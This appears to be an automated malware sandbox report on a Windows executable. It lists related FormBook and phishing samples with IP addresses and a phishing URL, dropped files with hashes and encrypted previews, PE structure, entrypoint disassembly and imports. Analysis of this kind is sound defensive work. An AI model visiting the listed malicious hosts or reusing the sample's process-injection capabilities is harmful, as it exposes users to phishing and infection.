	arm6.elf	Get hash	malicious	Unknown	Browse	93.127.202.25
	https://aliceblue-dolphin-702154.hostingersite.com/juno-server-alerts.com/authen.php/	Get hash	malicious	Unknown	Browse	93.127.179.137
MULTIBAND-NEWHOPEUS	zE1VxVoZ3W.exe	Get hash	malicious	FormBook	Browse	209.74.79.42
	KSts9xW7qy.exe	Get hash	malicious	FormBook	Browse	209.74.77.109
	rQuotation.exe	Get hash	malicious	FormBook	Browse	209.74.79.40
	TNT AWB TRACKING DETAILS.exe	Get hash	malicious	FormBook	Browse	209.74.64.189
	z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exe	Get hash	malicious	FormBook	Browse	209.74.79.41
	ORDER - 401.exe	Get hash	malicious	FormBook	Browse	209.74.77.107
	SC_TR11670000_pdf.exe	Get hash	malicious	FormBook	Browse	209.74.64.58
	PO 1202495088.exe	Get hash	malicious	FormBook	Browse	209.74.79.40
	ORDER-401.exe	Get hash	malicious	FormBook	Browse	209.74.77.107
	Rockwool-Msg-S9039587897.pdf	Get hash	malicious	EvilProxy, HTMLPhisher	Browse	209.74.95.101

Process:	C:\Windows\SysWOW64\logman.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\acrorrheuma

Download File

Process:	C:\Users\user\Desktop\NWPZbNcRxL.exe
File Type:	data
Category:	dropped
Size (bytes):	287744
Entropy (8bit):	7.993155747129862
Encrypted:	true
SSDEEP:	6144:AsqKCOddI/n34ZJAzH019+GSfbYur8k8wef5Z:DqPl34ZaGSfbjzAL
MD5:	4B50DB490ADD7087AF0FEC96F3545047
SHA1:	D99964957FAD4B53D33F27DCD9FBD9B6F479771C
SHA-256:	FA3274CD5964F24E178888A4970D106F5987F60DCA1A5B21F794F2AB27D7B7B7
SHA-512:	A598A308C50213F0FCFFA5347BFF463E5DC8A7551C691A6D3B0205620887980FA20D399A668187BBCFE6AFEB6C53E337BA3CAAC74A090512C3CB572050413FD0
Malicious:	false
Reputation:	low
Preview:	...9;D9L0XES..98.9L4XESV.98D9L4XESVM98D9L4XESVM98D9L4XESVM98.9L4VZ.XM.1...5..r.%PKdI>[?72;mZYW#@x'6v?LVdP"....v V\!.A9RaSVM98D955Q.n6..$^..8".L..~Y+.B...qY_.#.y31.kQ'QqT?.SVM98D9Ld.ES.L88..hXESVM98D.L6YNR]M9j@9L4XESVM9.P9L4HESV==8D9.4XUSVM;8D?L4XESVM?8D9L4XES&I98F9L4XESTMy.D9\4XUSVM9(D9\4XESVM)8D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM.L!A84XE..I98T9L4.ASV]98D9L4XESVM98D.L48ESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4X

C:\Users\user\AppData\Local\Temp\autCA7F.tmp

Download File

Process:	C:\Users\user\Desktop\NWPZbNcRxL.exe
File Type:	data
Category:	dropped
Size (bytes):	287744
Entropy (8bit):	7.993155747129862
Encrypted:	true
SSDEEP:	6144:AsqKCOddI/n34ZJAzH019+GSfbYur8k8wef5Z:DqPl34ZaGSfbjzAL
MD5:	4B50DB490ADD7087AF0FEC96F3545047
SHA1:	D99964957FAD4B53D33F27DCD9FBD9B6F479771C
SHA-256:	FA3274CD5964F24E178888A4970D106F5987F60DCA1A5B21F794F2AB27D7B7B7
SHA-512:	A598A308C50213F0FCFFA5347BFF463E5DC8A7551C691A6D3B0205620887980FA20D399A668187BBCFE6AFEB6C53E337BA3CAAC74A090512C3CB572050413FD0
Malicious:	false
Reputation:	low
Preview:	...9;D9L0XES..98.9L4XESV.98D9L4XESVM98D9L4XESVM98D9L4XESVM98.9L4VZ.XM.1...5..r.%PKdI>[?72;mZYW#@x'6v?LVdP"....v V\!.A9RaSVM98D955Q.n6..$^..8".L..~Y+.B...qY_.#.y31.kQ'QqT?.SVM98D9Ld.ES.L88..hXESVM98D.L6YNR]M9j@9L4XESVM9.P9L4HESV==8D9.4XUSVM;8D?L4XESVM?8D9L4XES&I98F9L4XESTMy.D9\4XUSVM9(D9\4XESVM)8D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM.L!A84XE..I98T9L4.ASV]98D9L4XESVM98D.L48ESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4X

C:\Users\user\AppData\Local\Temp\autCACE.tmp

Download File

Process:	C:\Users\user\Desktop\NWPZbNcRxL.exe
File Type:	data
Category:	dropped
Size (bytes):	14554
Entropy (8bit):	7.637138595003517
Encrypted:	false
SSDEEP:	384:dTYznwMNeAOPPYLDfvWME/eTk5mUOYLHReDoJVt1:dAwJV8DfvWkOLwML
MD5:	0BAA91776C98B95BE1229940BF548EE9
SHA1:	CAFF214E1296BE9E4E4AE420721B0D3BBBDC50DA
SHA-256:	42E5109BA48D4A6F9570B7BC071F80F0597C42B5AB4E50A2710CC28653BD09E2
SHA-512:	EBA46ABF0597948219BD74836B7F6DB2637EC0694742C90B0923479690957BD4681AE1CF9C86291E0835FF4678903613E989731B0F3F3DA912B69A96C8766E41
Malicious:	false
Preview:	EA06..0..Y&.y..+x..f....... .V......71...@.x..L........`......8............`.......Z\|3@...@.........K.X@0.2.Z..Z>)..w.e....l !..m..;...\| !.....;....;.....l.;.0./.<.;...m..rd.....@->.....4....f.C.5..;.............r.....X.<>`.O..p.........!.........h.=..........<\|3.....c...h.. -...... ...X.Z?......(...(.G..4.h....x....M@N.......Z?.I.......N@R... ...5.(..,.._...k`........R...._.K..?d...B.... 7W.......n.../.~.....)...@...!K....h\|!._....ga._.5.1.....`v/.......NA...,...7.7.,..!6.b...Z?.K(-...0.h..&.._....' -.............-..........G.6.....d_.T......"....d_.(M..57....n.....`...L....K.L..6.s.A.?..L.......Bg>...w.36.... !...L...}....\|V.4..r......$............r..9....>.....2... ...b....`......k.(.....!`....,......V1`..f....X.>i.v'.3c.........G.4....E.?......9..X.......7...l.`..."...\.61*........f.....\|.`.O.......,`........nl,....C.`....p...Y......`....@n?..;g....0...d...l ...P.?'....}...........0...4.X...>y.....1......x...L.\.i.....)...@n?............b...@.>y...

C:\Users\user\AppData\Local\Temp\nondefinition

Download File

Process:	C:\Users\user\Desktop\NWPZbNcRxL.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	143378
Entropy (8bit):	2.7910352400807645
Encrypted:	false
SSDEEP:	192:mNxyGyDZFuil7LDZGMMVQc3GkcVoudfSq5+vLkHVoqW4/qb35mwBgZihJahYDt07:1
MD5:	E0BCF9AE3A0681769774291A22605EFE
SHA1:	D63B5DB4C44584C329074553FBBD894701297BFE
SHA-256:	DAD35DFA8D6EAF22E9381214B3E5FAF8DE4CBE1717BE3FD76630F7B73CEE64AE
SHA-512:	92EED1EDC02B454E9CC8B270AF22E09AFEB497FA6FAEC8CEDE366ACCBB6A2581D21AE1119E41F1A019A4AD30DE0F7CB6841C43A30AA1FDBEE8D484FDB0E6E37E
Malicious:	false
Preview:	2d0w02d0wx2d0w52d0w52d0w82d0wb2d0we2d0wc2d0w82d0w12d0we2d0wc2d0wc2d0wc2d0w02d0w22d0w02d0w02d0w02d0w02d0w52d0w62d0w52d0w72d0wb2d0w82d0w62d0wb2d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w92d0w42d0w52d0w82d0w42d0wb2d0w92d0w62d0w52d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w92d0w42d0wd2d0w82d0w62d0wb2d0wa2d0w72d0w22d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w92d0w52d0w52d0w82d0w82d0wb2d0w82d0w62d0we2d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w92d0w42d0w52d0w82d0wa2d0wb2d0w92d0w62d0w52d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w92d0w42d0wd2d0w82d0wc2d0wb2d0wa2d0w62d0wc2d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w92d0w52d0w52d0w82d0we2d0wb2d0w82d0w32d0w32d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w92d0w42d0w52d0w92d0w02d0wb2d0w92d0w32d0w22d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w92d0w42d0wd2d0w92d0w22d0wb2d0wa2d0w22d0we2d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w92d0w52d0w52d0w92d0w42d0wb2d0w82d0w62d0w42d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w9

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.1033686237712725
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	NWPZbNcRxL.exe
File size:	1'255'936 bytes
MD5:	37148a3441bcc11c173f13e149c7284b
SHA1:	ad8b541688375bf90cb89eeb94bc8262508401f4
SHA256:	05cddefc8992523851a932ec1420caf380bd0907ac51d8e8b2a8b41027781c96
SHA512:	190002fae0cf74dfb17a0d6b2d4b9316ad8c70c21c476def85231fbe501ce08d9bc3acc2b08ec7178163fec39378b83aa4325f802c4be012ac72a6e219b0eb1c
SSDEEP:	24576:fu6J33O0c+JY5UZ+XC0kGso6FaIlJbZrb8cYZ5qRy61a4oWY:pu0c++OCvkGs9FaInZcma2Y
TLSH:	13459D32A3DD8360CA675D33FB6D770D6EBB78610630B856DE8C0F79A9E0161162C663
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

File Icon


Icon Hash:	185ada32e9cc368b

Static PE Info

General

Entrypoint:	0x427dcd
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x6756D4D0 [Mon Dec 9 11:30:24 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	afcdf79be1557326c854b6e20cb900a7

Entrypoint Preview

Instruction
call 00007F397C6E1A5Ah
jmp 00007F397C6D4824h
int3
int3
int3
int3
int3
int3
int3
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007F397C6D49AAh
cmp edi, eax
jc 00007F397C6D4D0Eh
bt dword ptr [004C31FCh], 01h
jnc 00007F397C6D49A9h
rep movsb
jmp 00007F397C6D4CBCh
cmp ecx, 00000080h
jc 00007F397C6D4B74h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007F397C6D49B0h
bt dword ptr [004BE324h], 01h
jc 00007F397C6D4E80h
bt dword ptr [004C31FCh], 00000000h
jnc 00007F397C6D4B4Dh
test edi, 00000003h
jne 00007F397C6D4B5Eh
test esi, 00000003h
jne 00007F397C6D4B3Dh
bt edi, 02h
jnc 00007F397C6D49AFh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007F397C6D49B3h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007F397C6D4A05h
bt esi, 03h
jnc 00007F397C6D4A58h

Rich Headers

Programming Language:

[ASM] VS2013 build 21005
[ C ] VS2013 build 21005
[C++] VS2013 build 21005
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2013 UPD4 build 31101
[RES] VS2013 build 21005
[LNK] VS2013 UPD4 build 31101

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xba44c	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc7000	0x6a078	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x132000	0x711c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x92bc0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xa4870	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8f000	0x884	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8dcc4	0x8de00	d28a820a1d9ff26cda02d12b888ba4b4	False	0.5728679102422908	data	6.676118058520316	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8f000	0x2e10e	0x2e200	79b14b254506b0dbc8cd0ad67fb70ad9	False	0.33535526761517614	OpenPGP Public Key	5.76010872795207	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xbe000	0x8f74	0x5200	9f9d6f746f1a415a63de45f8b7983d33	False	0.1017530487804878	data	1.198745897703538	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc7000	0x6a078	0x6a200	fb8c94215630af1f831c623996b79800	False	0.7748178003533569	data	7.419965557518136	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x132000	0x711c	0x7200	6fcae3cbbf6bfbabf5ec5bbe7cf612c3	False	0.7650767543859649	data	6.779031650454199	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc7518	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xc7640	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xc7768	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xc7890	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	English	Great Britain	0.4051418439716312
RT_ICON	0xc7cf8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	English	Great Britain	0.2319418386491557
RT_ICON	0xc8da0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	English	Great Britain	0.16597510373443983
RT_ICON	0xcb348	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16384	English	Great Britain	0.12966461974492205
RT_ICON	0xcf570	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 65536	English	Great Britain	0.08139122205134272
RT_MENU	0xdfd98	0x50	data	English	Great Britain	0.9
RT_STRING	0xdfde8	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xe037c	0x68a	data	English	Great Britain	0.2747909199522103
RT_STRING	0xe0a08	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xe0e98	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xe1494	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xe1af0	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xe1f58	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xe20b0	0x4ea74	data			1.0003290249686496
RT_GROUP_ICON	0x130b24	0x4c	data	English	Great Britain	0.8157894736842105
RT_GROUP_ICON	0x130b70	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x130b84	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x130b98	0x14	data	English	Great Britain	1.25
RT_VERSION	0x130bac	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x130c88	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll	GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll	AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll	StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll	GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
